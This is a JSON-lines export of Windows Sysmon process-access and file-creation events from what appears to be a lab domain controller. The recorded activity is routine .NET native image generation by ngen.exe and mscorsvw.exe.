{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6382,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.415\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-0010BFDB0B00}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.415","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-0010BFDB0B00}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6383,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.415\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-0010BFDB0B00}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.415","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-0010BFDB0B00}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6384,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:15.431\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043B-5F25-0000-0010BFDB0B00}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:15.431","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043B-5F25-0000-0010BFDB0B00}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6385,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:16.806\r\nProcessGuid: {A837DB8D-043B-5F25-0000-0010BFDB0B00}\r\nProcessId: 3320\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cf8-0\\Microsoft.VisualBasic.dll\r\nCreationUtcTime: 2020-08-01 05:57:16.806","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:16.806","ProcessGuid":"{A837DB8D-043B-5F25-0000-0010BFDB0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cf8-0\\Microsoft.VisualBasic.dll","CreationUtcTime":"2020-08-01 05:57:16.806","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6386,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:16.868\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043C-5F25-0000-0010DFE00B00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:16.868","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043C-5F25-0000-0010DFE00B00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6387,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:16.868\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043C-5F25-0000-0010DFE00B00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:16.868","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043C-5F25-0000-0010DFE00B00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6388,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:16.884\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043C-5F25-0000-0010DFE00B00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:16.884","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043C-5F25-0000-0010DFE00B00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6389,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:16.915\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043C-5F25-0000-001029E40B00}\r\nTargetProcessId: 5104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:16.915","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043C-5F25-0000-001029E40B00}","TargetProcessId":"5104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6390,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:16.915\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043C-5F25-0000-001029E40B00}\r\nTargetProcessId: 5104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 